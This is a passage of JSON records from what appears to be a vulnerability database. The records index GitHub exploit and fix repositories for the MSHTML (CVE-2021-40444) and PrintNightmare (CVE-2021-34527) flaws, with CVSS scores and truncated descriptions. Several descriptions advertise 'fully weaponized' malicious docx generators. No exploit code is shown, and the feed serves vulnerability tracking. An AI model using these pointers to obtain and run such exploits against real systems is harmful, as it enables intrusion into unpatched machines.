"published": "2021-09-24T10:59:34", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T00:43:34", "id": "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:25", "description": "# CVE-2021-40444 docx Generate\ndocx generating to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T05:31:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-14T23:45:35", "id": "0990FE6E-7DC3-559E-9B84-E739872B988C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:32", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-28T06:33:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-28T09:38:18", "id": "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-05T05:19:33", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-05T02:27:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T02:29:52", "id": "1934A15D-9857-5560-B6CA-EA6A2A8A91F8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-09T21:51:56", "description": "# Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T08:32:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-09T21:16:38", "id": "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:19", "description": "# PowerShell-PrintNightmare\nA collection of scripts to help set ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T21:28:16", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-11T16:21:00", "id": "98CA9A39-577D-51F2-B8B9-B20E80D94173", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:34", "description": "# Fix-CVE-2021-34527\nFix for the securit...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T14:25:44", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-03T09:03:00", "id": "FBC9D472-5E25-508D-AB6E-B3197FCFED2D", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T14:29:26", "description": "# PrintNightmare CVE-2021-34527\n\nBy now you most probably alread...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T07:58:53", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:16:25", "id": "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:10:41", "description": "# Docx-Exploit-2021\n\nThis docx exploit uses r...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-29T10:35:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-04-11T07:58:23", "id": "B9C2639D-9C07-5F11-B663-C144F457A9F7", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T08:47:22", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T22:34:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-31T01:08:02", "id": "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:37", "description": "# CVE-2021-40444-URL-Extractor\n\nPython script to extract embedde...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T16:54:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T19:01:48", "id": "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:09", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-22T13:29:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-22T13:41:39", "id": "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-26T03:16:25", "description": "# CVE-2021-40444-POC\nAn attempt to reproduce Microsoft MSHTML Re...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T14:55:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-26T02:46:54", "id": "8B907536-B213-590D-81B9-32CF4A55322E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:21:49", "description": "# Microsoft-Office-Word-MSHTML-Remote-Code-Exe...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-19T08:16:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:49:48", "id": "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:48", "description": "# TIC4301_Project\nTIC4301 Project - CVE-2021-40444\n\nDownload the...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-16T07:07:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-06T13:36:02", "id": "111C9F44-593D-5E56-8040-615B48ED3E24", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:24", "description": "# Printnightmare\nFix for PrintNightmare CVE-2021-34527\n\n![Printn...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T09:22:03", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-09T11:02:54", "id": "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-06T11:53:20", "description": "# PsFix-CVE-2021-34527\nFix-CVE-2021-34527\nFi...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-07T20:14:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T20:18:26", "id": "26B4C125-95CE-54A5-82FB-2D1C219A09CB", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:16:59", "description": "# disable-RegisterSpoolerRemoteRpcEndPoint\nWorkaround for Window...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T16:49:32", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T21:11:43", "id": "E235B3DF-990F-5508-9496-90462B45125D", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:56", "description": "PrintNightmare CVE-2021-34527 powershell PowerShell workaround t...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T20:02:50", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T13:34:12", "id": "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:55:35", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T01:32:18", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-09T03:54:14", "id": "1E42289A-77F8-55A2-B85E-83CAA00CE951", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-26T12:23:19", "description": "# Introduction\nPrintNightmare-Patcher, a simple tool that resolv...", "cvss3": {"exploitabilityScore": 2.8, 